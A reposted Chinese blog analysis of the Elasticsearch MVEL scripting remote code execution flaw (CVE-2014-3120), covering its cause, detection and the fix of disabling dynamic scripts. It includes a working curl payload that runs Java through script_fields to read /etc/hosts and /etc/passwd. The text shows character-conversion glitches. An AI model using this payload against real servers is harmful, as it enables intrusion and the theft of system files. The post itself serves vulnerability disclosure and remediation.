ElasticSearch远程随意代码运行漏洞(CVE-2014-3120)分析
原理
這個(gè)漏洞實(shí)際上非常easy,ElasticSearch有腳本運(yùn)行(scripting)的功能,能夠非常方便地對(duì)查詢(xún)出來(lái)的數(shù)據(jù)再加工處理。
ElasticSearch用的腳本引擎是MVEL,這個(gè)引擎沒(méi)有做不論什么的防護(hù),或者沙盒包裝,所以直接能夠運(yùn)行隨意代碼。
而在ElasticSearch里,默認(rèn)配置是打開(kāi)動(dòng)態(tài)腳本功能的,因此用戶(hù)能夠直接通過(guò)http請(qǐng)求,運(yùn)行隨意代碼。
事實(shí)上官方是清楚這個(gè)漏洞的,在文檔里有說(shuō)明:
First, you should not run Elasticsearch as the root user, as this would allow a script to access or do anything on your server, without limitations. Second, you should not expose Elasticsearch directly to users, but instead have a proxy application inbetween.?
檢測(cè)方法
在線檢測(cè):
http://tool.scanv.com/es.html ? ? ? ? ?能夠檢測(cè)隨意地址
http://bouk.co/blog/elasticsearch-rce/poc.html ? 僅僅檢測(cè)localhost。只是會(huì)輸出/etc/hosts和/etc/passwd文件的內(nèi)容到網(wǎng)頁(yè)上
自己手動(dòng)檢測(cè):
curl -XPOST 'http://localhost:9200/_search?pretty' -d ' { "size": 1, "query": { "filtered": { "query": { "match_all": {} } } }, "script_fields": { "/etc/hosts": { "script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/hosts\")).useDelimiter(\"\\\\Z\").next();" }, "/etc/passwd": { "script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/passwd\")).useDelimiter(\"\\\\Z\").next();" } } } '
處理辦法
關(guān)掉運(yùn)行腳本功能,在配置文件elasticsearch.yml里為每個(gè)結(jié)點(diǎn)都加上:
script.disable_dynamic: truehttp://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html#_disabling_dynamic_scripts
官方會(huì)在1.2版本號(hào)默認(rèn)關(guān)閉動(dòng)態(tài)腳本。
https://github.com/elasticsearch/elasticsearch/issues/5853
參考:
http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html
http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/search-request-script-fields.html
http://bouk.co/blog/elasticsearch-rce/
轉(zhuǎn)載于:https://www.cnblogs.com/jzssuanfa/p/6803338.html
總結(jié)
以上是生活随笔為你收集整理的ElasticSearch远程随意代码运行漏洞(CVE-2014-3120)分析的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 常用的特征选择算法介绍
- 下一篇: iOS7初体验(2)——单元测试